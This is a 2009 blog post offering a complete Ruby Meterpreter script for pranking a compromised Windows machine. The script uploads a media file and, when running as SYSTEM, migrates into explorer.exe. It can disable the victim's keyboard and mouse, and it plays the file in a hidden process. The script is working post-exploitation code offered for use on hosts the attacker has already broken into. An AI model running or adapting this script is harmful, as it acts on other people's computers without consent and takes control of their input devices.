Monday, March 30, 2009

Rickroll Meterpreter Script

In order to be well prepared for April Fools day I decided to put out a rickroll meterpreter script.

It defaults to looking for rickroll.mp3 in the metasploit framework root directory, but you can use another file with the -f option. I don't parse out the name so you will have to copy it into the metasploit directory.

You can also use any file format supported by windows media player so you can have it play a wmv (even better). By default the process is hidden, but you can make it visible with a -v option.

New Features!
And just for added fun, throw in a -k to disable the keyboard or -m to disable the mouse or you can go all in by using the -e to disable the mouse and keyboard and save precious keystrokes.

Here is the file:
rickroll.tar

Put it in framework3/meterpreter/scripts

#
# Provided by Tim Medin at timmedin[at]gmail [dot] com
#
# Uploads the rick roll'ing mp3 and then runs it as a hidden process
# You can also upload a different file (like a wmv video) and have it display -v
#
# Known Issues: I don't parse the file name provided by -f so make
#   sure the file is in the framework's root directory
#
# Added disable keyboard and mouse features
#
# *** Thanks for help from dark operator (Carlos Perez) ***
#
def message
        print_status "Rickroll'ing Meterpreter Script"
end
def usage
        print(
        "Windows Rickroll Meterpreter Script\n" +
        "Usage: rickroll [-h] [-k] [-m] [-e] [-v] \[-f <filename>\]\n" +
        @@exec_opts.usage
        )
end

@@exec_opts = Rex:arser::Arguments.new(
  "-h"  => [ false,  "Help menu."],
  "-f"  => [ false,  "File to upload"],
  "-k"  => [ false,  "Disable Keyboard"],
  "-m"  => [ false,  "Disable Mouse"],
  "-e"  => [ false,  "Disable Keyboard & Mouse"],
  "-v"  => [ false,  "Visible"]
)

rick = "rickroll.mp3"
mediaplayer = "\"C:\\Program Files\\Windows Media Player\\wmplayer.exe\""
visible = false
keyboard = true
mouse = true

@@exec_opts.parse(args) { |opt, idx, val|
        case opt
                when "-k"
                        keyboard = false
                when "-m"
                        mouse = false
                when "-e"
                        keyboard = false
                        mouse = false
                when "-v"
                        visible = true
                when "-f"
                        rick = val
                when "-h"
                        usage
                        abort
                        break
                end
}

session = client

#upload file
print_status("Uploading file #{rick}")
uploadpath = session.fs.file.expand_path("%temp%") + "\\#{rand(100)}.mp3"
client.fs.file.upload_file(uploadpath, rick)
print_status("Uploaded file to #{uploadpath}")

if (session.sys.config.getuid == "NT AUTHORITY\\SYSTEM")
        go = false
        process2mig = "explorer.exe"
        session.sys.process.get_processes().each do |x|
        if (process2mig.index(x['name'].downcase))
                print_status("\t#{process2mig} Process found, migrating..")
                session.core.migrate(x['pid'].to_i)
                print_status("Migration Successful!!")
                go = true
                end
        end
else
        go = true
end

if (go)
        if (!mouse)
                print_status("Disabling mouse to extend the pain!")
                session.ui.disable_mouse
        end
        if (!keyboard)
                print_status("Disabling keyboard to extend the pain!")
                session.ui.disable_keyboard
        end
        print_status("Rick rolling!")
        client.sys.process.execute("#{mediaplayer} \"#{uploadpath}\"", nil, {'Hidden' => !visible})
else
        print_status("Need logged in user to execute, cannot find explorer.exe to migrate")
end

No comments:

Post a Comment